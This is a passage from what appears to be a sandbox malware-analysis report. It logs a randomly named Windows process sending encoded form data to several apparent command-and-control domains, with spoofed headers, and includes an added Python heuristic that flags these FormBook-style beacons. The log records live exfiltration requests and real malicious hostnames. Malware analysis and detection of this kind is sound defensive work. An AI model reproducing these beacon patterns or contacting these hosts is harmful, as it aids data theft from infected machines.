                                                          Data Ascii: TvpPfhGp=QJQ8m5wqGYDfa69O7/1YVdreShaRQ0e3nAhJnYw7YQm+qEf2oGO8SGCobvUAz3OymIYn+2Vq12aMIKg3Dy1iBzYPUmXNbi6aEr3eicPam98NDNA2/YGZAezqHoA/9por7HVeSEkCXgmQovnGe4cFZzBYMB+ldXp7fwJT6Ol3QLJmWAkibO8axXtb2CcX/IVGJOx6RJARWDZspc9mXvV0jN+C76mZOx6ivdOvznGd1yHlh60/4688d0xVnFxIKJM7bDmI9KDkiC1QQq0X2AX71nGelL4WfdB2K3P4tsOvhZm2fEafC7cICuUD0p4uur8AqxNYZZ0q4HMu73UmvqMKYKo6bgjygAIF9g2JkzRrgJHOl1bKZ26tyHziCWTOKVmQ896wWCTsThn5zcB1fkwnLzM3AafFTI7Z/XXcd8AoLk6W29xkMVz+sX9MhHC9IZdMJAxjC+pYGKdHgB3AKR+oXRBdpc1Ry7bz6OomPq9/1gjKPzKZAV6GQV79Pm/I3h830m3kZzcIew31hocuWRumupt1Wicg9+ZISxxkuXTYmurP9OCcK4u0UFNZdV6bFNzL6irBzO7k+LE3boL9pN7T6Vr6YtIDUgmREnrgQDWhgQvCJffSa+rhyr+QMMT+kr/b78MBL28UXdF1vHpZtijTx3ZlS+l4AvA4rtQDskdHfO2FDTRc8Hqwj3k1FaE9tmIymRMpNueExefrwXbVAKvGE6MDLDcIlrD6fVIyDcWMs4UV7Md7beVlNtlX1EUjIE3zdccm17Pqa4WZpkB9A3f9lV+qTMA6rHQBVgF6Fg+MFjMWKMfcHGvR2hLwWQzDYSIVc1lsi7T+pTLlpvv/2th70zmqnR56mvA0tPy6B8XfLe0bgefFERfJ8il5ap92I8QdZH1uunoG5l79CGD8EDQnti3SRCO/F6xRvU9PG1mfXorED8d2ZYLKECzAiyKFgIpV4PXOK8Vs3fC5fydl0MXtQeMxCOz1xEO2JTBNiUnwlNY [TRUNCATED]
Jul 3, 2024 15:57:19.728038073 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                                          Server: nginx/1.20.2
                                                          Date: Wed, 03 Jul 2024 13:57:19 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Via: 1.1 google
                                                          Connection: close
Jul 3, 2024 15:57:19.728055954 CEST | 157 | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49745 | 35.244.172.47 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 15:57:21.504600048 CEST | 465 | OUT | GET /5uz4/?TvpPfhGp=dL4clO0CJrDMcIxu4IdYSuD/cDaqSVWvuwN44KEfTTu0on3tmzTjREisTNIHlk2ZlqA7xyFr2WD4XoYfHF4eAi4rK2PJMwuiV4L1panftdceIKli3LKULfU=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.ajjmamlllqqq.xyz
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
Jul 3, 2024 15:57:22.139457941 CEST | 300 | IN | HTTP/1.1 200 OK
                                                          Server: nginx/1.20.2
                                                          Date: Wed, 03 Jul 2024 13:57:22 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 5161
                                                          Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                                          Vary: Accept-Encoding
                                                          ETag: "65a4939c-1429"
                                                          Cache-Control: no-cache
                                                          Accept-Ranges: bytes
                                                          Via: 1.1 google
                                                          Connection: close
Jul 3, 2024 15:57:22.152919054 CEST | 1236 | IN | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                          Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
Jul 3, 2024 15:57:22.152940035 CEST | 1236 | IN | Data Raw: 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 65 70 6f 72 74 4c 6f 61 64 69 6e 67 28 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f
                                                          Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
Jul 3, 2024 15:57:22.152954102 CEST | 1236 | IN | Data Raw: 74 72 3d 64 73 66 72 70 66 76 65 64 6e 63 70 73 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f
                                                          Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
Jul 3, 2024 15:57:22.153023958 CEST | 1236 | IN | Data Raw: 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63 79 2f 76 63 6f 6e 73 6f 6c 65 2e 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72
                                                          Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
Jul 3, 2024 15:57:22.153037071 CEST | 217 | IN | Data Raw: e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f
                                                          Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49746 | 154.23.7.170 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 15:57:27.391318083 CEST | 723 | OUT | POST /ixzv/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.114lala.net
                                                          Origin: http://www.114lala.net
                                                          Referer: http://www.114lala.net/ixzv/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 36 71 4b 63 72 38 6b 33 2b 4b 4d 2f 44 6f 6e 38 33 33 4d 2b 2b 6a 46 31 52 78 4f 63 42 6b 48 48 6d 57 2f 65 35 49 38 38 54 32 2f 69 30 4c 4b 49 2b 52 54 37 72 4e 68 42 50 53 4f 55 64 43 6b 61 77 2b 6b 63 31 35 54 65 77 42 42 67 77 4a 34 69 4b 71 56 70 66 38 43 66 31 4f 68 62 6c 6f 43 35 39 54 74 4f 56 44 76 6f 50 58 55 69 46 69 4f 2f 65 69 43 48 72 2f 61 77 65 66 46 7a 73 6a 62 58 4a 6e 44 6e 39 38 67 49 53 71 37 7a 78 41 4f 51 55 69 54 57 58 5a 54 64 54 6b 51 2b 36 5a 63 36 6a 54 65 79 30 47 57 4f 74 44 46 58 37 44 53 69 37 33 34 43 37 65 41 66 35 62 44 38 57 58 42 69 48 51 3d 3d
                                                          Data Ascii: TvpPfhGp=6qKcr8k3+KM/Don833M++jF1RxOcBkHHmW/e5I88T2/i0LKI+RT7rNhBPSOUdCkaw+kc15TewBBgwJ4iKqVpf8Cf1OhbloC59TtOVDvoPXUiFiO/eiCHr/awefFzsjbXJnDn98gISq7zxAOQUiTWXZTdTkQ+6Zc6jTey0GWOtDFX7DSi734C7eAf5bD8WXBiHQ==
Jul 3, 2024 15:57:28.431289911 CEST | 240 | IN | HTTP/1.1 200 OK
                                                          Transfer-Encoding: chunked
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Encoding: gzip
                                                          Server: Nginx Microsoft-HTTPAPI/2.0
                                                          X-Powered-By: Nginx
                                                          Date: Wed, 03 Jul 2024 13:57:45 GMT
                                                          Connection: close
                                                          Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                          Data Ascii: a
Jul 3, 2024 15:57:28.431312084 CEST | 539 | IN | Data Raw: 32 30 32 0d 0a 9d 52 31 8f d3 30 14 de fb 2b 2c 2f 49 25 6a 5f c5 0d f4 9a 64 38 04 63 c5 70 1b 62 70 1c 37 71 49 ec 60 bf 34 6d d1 49 30 20 1d d3 9d d8 90 6e 40 20 06 24 06 26 84 40 3a 7e 4d ab bb 89 bf 80 d3 84 bb 82 60 e1 49 b1 f5 f2 de f7 bd
                                                          Data Ascii: 202R10+,/I%j_d8cpbp7qI`4mI0 n@ $&@:~M`I>9Z!J&mMJ.L]YBh^Bw'./.6_7o?O>_={9yl7h5eI%!8113V@Xtp#zPV?!gs
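The sessions above share one request shape regardless of which host is contacted: the same iPad/Mercury User-Agent on every request, a single four-character path segment (/i3r0/, /5uz4/, /ixzv/), one form parameter (TvpPfhGp) whose value is a base64 blob, and on the POSTs an Origin and Referer that simply mirror Host and path. The servers answer differently (a hosting-provider 404 page, a 405 from nginx, a 200 carrying an unrelated page), so the response is not what to key on. The script below is an added example, not part of the report and not code from the sample: it scores each captured request on those traits and then correlates the parameter name across hosts, which is the signal a single-request rule cannot see. The four malicious inputs are copied from sessions 4, 5, 8 and 9; the benign control request, its Windows User-Agent, the three-trait cut-off and the 64-byte blob floor are assumptions made for the example. The blob is left opaque: the report does not decrypt it and neither does this code.

```python
"""FormBook-style beacon heuristics run over the requests captured in sessions 4, 5, 8
and 9 above.  Added example: the cut-off, blob floor and benign control are assumptions."""
import base64
import binascii
import re
from collections import defaultdict

IPAD_UA = ("Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 "
           "(KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53")  # sent in every session
PATH_RE = re.compile(r"^/[A-Za-z0-9]{4}/$")     # /i3r0/, /5uz4/, /ixzv/
PARAM_RE = re.compile(r"^[A-Za-z0-9]{4,10}$")   # TvpPfhGp, Y664G
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def raw_request(request_line, host, body=None, ua=IPAD_UA):
    """Rebuild a request as text, keeping only the headers scored below."""
    path = request_line.split()[1].partition("?")[0]
    lines = [request_line, f"Host: {host}", "Connection: close", f"User-Agent: {ua}"]
    if body is not None:  # the POSTs in the report carry these three extra headers
        lines += ["Content-Type: application/x-www-form-urlencoded",
                  f"Origin: http://{host}", f"Referer: http://{host}{path}"]
    return "\n".join(lines) + "\n\n" + (body or "")

# First four entries copied from sessions 4, 5, 8 and 9; the last is a constructed benign control.
SAMPLES = [
    raw_request("GET /i3r0/?TvpPfhGp=2wwNf3uh0L74coHFwFoEwJLZZncz0eUv2PDbuROkov9Y0f520r30B60Dc6sw70wr8VqsfcnHqRGaEDIOfEcEM+xuD/kdVb8f6u/HqHihPox78cRvPoIrzf8=&Y664G=SttDen986 HTTP/1.1", "www.eoghenluire.com"),
    raw_request("POST /5uz4/ HTTP/1.1", "www.ajjmamlllqqq.xyz", body="TvpPfhGp=QJQ8m5wqGYDfbZlO4YhYedrdcBaRfUeznAtJnZkrZjK+q1P2pga8UGCodvUMtHOemIcr+yQd102MKrw3F0BhVTYBD2XObi7QErnaidP8m90NC+o25oGeM+zqHoAz9poD7D54SFtPQQKQoOrGffwGOjBUEh/sZnoDSVwh0e1CZYNAUhYeYNdywmt6wC17r5YscQ=="),
    raw_request("GET /5uz4/?TvpPfhGp=dL4clO0CJrDMcIxu4IdYSuD/cDaqSVWvuwN44KEfTTu0on3tmzTjREisTNIHlk2ZlqA7xyFr2WD4XoYfHF4eAi4rK2PJMwuiV4L1panftdceIKli3LKULfU=&Y664G=SttDen986 HTTP/1.1", "www.ajjmamlllqqq.xyz"),
    raw_request("POST /ixzv/ HTTP/1.1", "www.114lala.net", body="TvpPfhGp=6qKcr8k3+KM/Don833M++jF1RxOcBkHHmW/e5I88T2/i0LKI+RT7rNhBPSOUdCkaw+kc15TewBBgwJ4iKqVpf8Cf1OhbloC59TtOVDvoPXUiFiO/eiCHr/awefFzsjbXJnDn98gISq7zxAOQUiTWXZTdTkQ+6Zc6jTey0GWOtDFX7DSi734C7eAf5bD8WXBiHQ=="),
    raw_request("GET /news/index.html?page=2 HTTP/1.1", "www.example.com",
                ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"),
]

def parse_request(raw):
    """Split a raw HTTP request into method, path, query, headers and body."""
    head, _, body = raw.partition("\n\n")
    first, *rest = head.splitlines()
    method, target, _version = first.split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in rest:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": query, "headers": headers, "body": body.strip()}

def split_form(data):
    """Split k=v&k=v without URL-unquoting: '+' and '/' are base64 here, not spaces."""
    return [tuple(part.partition("=")[::2]) for part in data.split("&") if part]

def decode_blob(value):
    """Return the decoded bytes of a clean base64 value, else None (bytes stay opaque)."""
    if not B64_RE.match(value) or len(value) % 4:
        return None
    try:
        return base64.b64decode(value, validate=True)
    except binascii.Error:
        return None

def score_request(req):
    """Return (score, reasons); each reason is one trait seen in the capture."""
    reasons, h = [], req["headers"]
    if h.get("user-agent") == IPAD_UA:
        reasons.append("fixed iPad/Mercury User-Agent")
    if PATH_RE.match(req["path"]):
        reasons.append("single four-character path segment")
    data = req["query"] if req["method"] == "GET" else req["body"]
    blobs = [(k, decode_blob(v)) for k, v in split_form(data) if PARAM_RE.match(k)]
    if blobs and blobs[0][1] is not None and len(blobs[0][1]) >= 64:
        reasons.append(f"parameter {blobs[0][0]} carries a {len(blobs[0][1])}-byte opaque blob")
    if req["method"] == "POST":
        host = h.get("host", "")
        if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{req['path']}":
            reasons.append("Origin and Referer forged to match Host and path")
    return len(reasons), reasons

def correlate(reqs):
    """Map each blob-carrying parameter name to the hosts it was sent to."""
    hosts = defaultdict(set)
    for req in reqs:
        data = req["query"] if req["method"] == "GET" else req["body"]
        for name, value in split_form(data):
            if PARAM_RE.match(name) and decode_blob(value) is not None:
                hosts[name].add(req["headers"].get("host", ""))
    return dict(hosts)

def analyse(samples, cutoff=3):
    """Score every request; return (verdicts, parameter-to-hosts map)."""
    verdicts, reqs = [], [parse_request(s) for s in samples]
    for r in reqs:
        score, reasons = score_request(r)
        verdicts.append({"host": r["headers"].get("host", ""), "method": r["method"],
                         "score": score, "beacon": score >= cutoff, "reasons": reasons})
    return verdicts, correlate(reqs)

if __name__ == "__main__":
    verdicts, by_param = analyse(SAMPLES)
    for v in verdicts:
        print(f"{v['method']:<4} {v['host']:<22} score={v['score']} beacon={v['beacon']} {v['reasons']}")
    print({name: sorted(hosts) for name, hosts in by_param.items()})
```

Run it directly to get one verdict per request plus the parameter-to-host map; the four captured requests score three or four traits and the control scores none, and TvpPfhGp is the only parameter name that reaches three different hosts. The form data is split by hand rather than with urllib's parse_qs because parse_qs turns '+' into a space and would corrupt the base64 before the length check. In a real deployment the cross-host correlation would be keyed per source process or host rather than per capture, which is exactly the view the PID column in the session tables above gives you.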


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49747 | 154.23.7.170 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 15:57:29.927300930 CEST | 743 | OUT | POST /ixzv/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.114lala.net
                                                          Origin: http://www.114lala.net
                                                          Referer: http://www.114lala.net/ixzv/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 36 71 4b 63 72 38 6b 33 2b 4b 4d 2f 46 49 33 38 6e 67 59 2b 72 7a 46 30 55 78 4f 63 4b 45 48 4c 6d 57 7a 65 35 4a 35 6a 53 45 62 69 33 70 43 49 39 51 54 37 71 4e 68 42 48 79 4f 72 54 69 6b 72 77 2b 6f 55 31 38 7a 65 77 42 46 67 77 49 49 69 4b 5a 39 71 46 4d 43 64 39 75 68 5a 6f 49 43 35 39 54 74 4f 56 48 48 47 50 58 63 69 46 53 2b 2f 66 42 61 45 68 66 61 78 4f 2f 46 7a 6d 44 62 4c 4a 6e 44 42 39 34 42 74 53 73 2f 7a 78 42 2b 51 58 7a 54 58 4f 70 53 57 4e 6b 52 50 39 35 68 75 37 7a 2f 6d 31 58 2b 6f 77 41 6b 79 33 6c 44 34 71 47 5a 56 70 65 6b 73 6b 63 4b 49 62 55 38 72 63 54 6b 31 4e 57 56 6f 57 76 30 34 30 62 63 4c 76 61 5a 4a 37 31 59 3d
                                                          Data Ascii: TvpPfhGp=6qKcr8k3+KM/FI38ngY+rzF0UxOcKEHLmWze5J5jSEbi3pCI9QT7qNhBHyOrTikrw+oU18zewBFgwIIiKZ9qFMCd9uhZoIC59TtOVHHGPXciFS+/fBaEhfaxO/FzmDbLJnDB94BtSs/zxB+QXzTXOpSWNkRP95hu7z/m1X+owAky3lD4qGZVpekskcKIbU8rcTk1NWVoWv040bcLvaZJ71Y=
                                                          Jul 3, 2024 15:57:30.833509922 CEST | 240 | IN | HTTP/1.1 200 OK
                                                          Transfer-Encoding: chunked
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Encoding: gzip
                                                          Server: Nginx Microsoft-HTTPAPI/2.0
                                                          X-Powered-By: Nginx
                                                          Date: Wed, 03 Jul 2024 13:57:49 GMT
                                                          Connection: close
                                                          Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                          Data Ascii: a
                                                          Jul 3, 2024 15:57:30.833620071 CEST | 539 | IN | Data Raw: 32 30 32 0d 0a 9d 52 31 8f d3 30 14 de fb 2b 2c 2f 49 25 6a 5f c5 0d f4 9a 64 38 04 63 c5 70 1b 62 70 1c 37 71 49 ec 60 bf 34 6d d1 49 30 20 1d d3 9d d8 90 6e 40 20 06 24 06 26 84 40 3a 7e 4d ab bb 89 bf 80 d3 84 bb 82 60 e1 49 b1 f5 f2 de f7 bd
                                                          Data Ascii: 202R10+,/I%j_d8cpbp7qI`4mI0 n@ $&@:~M`I>9Z!J&mMJ.L]YBh^Bw'./.6_7o?O>_={9yl7h5eI%!8113V@Xtp#zPV?!gs


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          11 | 192.168.2.4 | 49748 | 154.23.7.170 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:57:33.170799017 CEST | 10825 | OUT | POST /ixzv/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.114lala.net
                                                          Origin: http://www.114lala.net
                                                          Referer: http://www.114lala.net/ixzv/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 36 71 4b 63 72 38 6b 33 2b 4b 4d 2f 46 49 33 38 6e 67 59 2b 72 7a 46 30 55 78 4f 63 4b 45 48 4c 6d 57 7a 65 35 4a 35 6a 53 45 54 69 30 61 61 49 2f 7a 37 37 34 64 68 42 4a 53 4f 51 54 69 6b 4d 77 2b 77 51 31 38 2b 70 77 48 5a 67 7a 75 63 69 42 4d 42 71 4c 38 43 64 78 4f 68 61 6c 6f 43 57 39 53 63 48 56 44 62 47 50 58 63 69 46 55 79 2f 59 53 43 45 6e 66 61 77 65 66 46 33 73 6a 62 76 4a 6b 79 36 39 34 45 59 52 63 66 7a 78 68 75 51 57 42 37 58 52 5a 53 55 5a 45 52 58 39 35 74 59 37 77 62 71 31 58 36 53 77 48 55 79 6d 52 53 30 37 48 70 57 6f 4d 4a 2f 77 4f 6d 64 5a 47 63 55 56 68 4a 51 4b 6b 31 51 47 65 6b 68 2f 35 42 44 31 2f 64 69 75 67 45 6c 4a 52 66 6e 79 74 70 6e 36 64 31 35 33 44 76 6d 53 6f 57 74 4c 34 74 74 39 77 72 2f 2f 50 32 55 4a 48 50 49 7a 79 52 52 30 75 32 72 6d 53 6a 45 59 45 75 55 38 73 79 42 70 6a 62 75 62 54 65 39 50 44 68 49 46 4c 35 52 57 78 66 75 4e 61 74 37 58 2b 6c 35 43 46 55 72 57 6c 53 59 68 70 56 57 58 67 78 6c 58 46 53 35 63 62 66 79 4a 6e 51 79 47 [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=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 [TRUNCATED]
                                                          Jul 3, 2024 15:57:34.069240093 CEST | 240 | IN | HTTP/1.1 200 OK
                                                          Transfer-Encoding: chunked
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Encoding: gzip
                                                          Server: Nginx Microsoft-HTTPAPI/2.0
                                                          X-Powered-By: Nginx
                                                          Date: Wed, 03 Jul 2024 13:57:52 GMT
                                                          Connection: close
                                                          Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                          Data Ascii: a
                                                          Jul 3, 2024 15:57:34.069585085 CEST | 539 | IN | Data Raw: 32 30 32 0d 0a 9d 52 31 8f d3 30 14 de fb 2b 2c 2f 49 25 6a 5f c5 0d f4 9a 64 38 04 63 c5 70 1b 62 70 1c 37 71 49 ec 60 bf 34 6d d1 49 30 20 1d d3 9d d8 90 6e 40 20 06 24 06 26 84 40 3a 7e 4d ab bb 89 bf 80 d3 84 bb 82 60 e1 49 b1 f5 f2 de f7 bd
                                                          Data Ascii: 202R10+,/I%j_d8cpbp7qI`4mI0 n@ $&@:~M`I>9Z!J&mMJ.L]YBh^Bw'./.6_7o?O>_={9yl7h5eI%!8113V@Xtp#zPV?!gs


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          12 | 192.168.2.4 | 49749 | 154.23.7.170 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:57:35.711591005 CEST | 460 | OUT | GET /ixzv/?TvpPfhGp=3oi8oJRBwbk3Fv7B4wkBwCYPdwSnFCWHmnvM7LB8bGn5gZyL3DPz3/FGAD+hTQwo1cQLx9Xf6C04wJsqCrUqebqL9pABwbW+sBk+bBPfLH9pAE6bRw2vg/E=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.114lala.net
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:57:36.616875887 CEST | 209 | IN | HTTP/1.1 200 OK
                                                          Transfer-Encoding: chunked
                                                          Content-Type: text/html; charset=UTF-8
                                                          Server: Nginx Microsoft-HTTPAPI/2.0
                                                          X-Powered-By: Nginx
                                                          Date: Wed, 03 Jul 2024 13:57:55 GMT
                                                          Connection: close
                                                          Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                          Data Ascii: 3
                                                          Jul 3, 2024 15:57:36.616898060 CEST | 890 | IN | Data Raw: 33 36 65 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 e8 90
                                                          Data Ascii: 36e<html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script>(function(){ var bp = documen


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          13 | 192.168.2.4 | 49750 | 203.161.41.205 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:57:41.703834057 CEST | 732 | OUT | POST /4n8t/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.shabygreen.top
                                                          Origin: http://www.shabygreen.top
                                                          Referer: http://www.shabygreen.top/4n8t/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
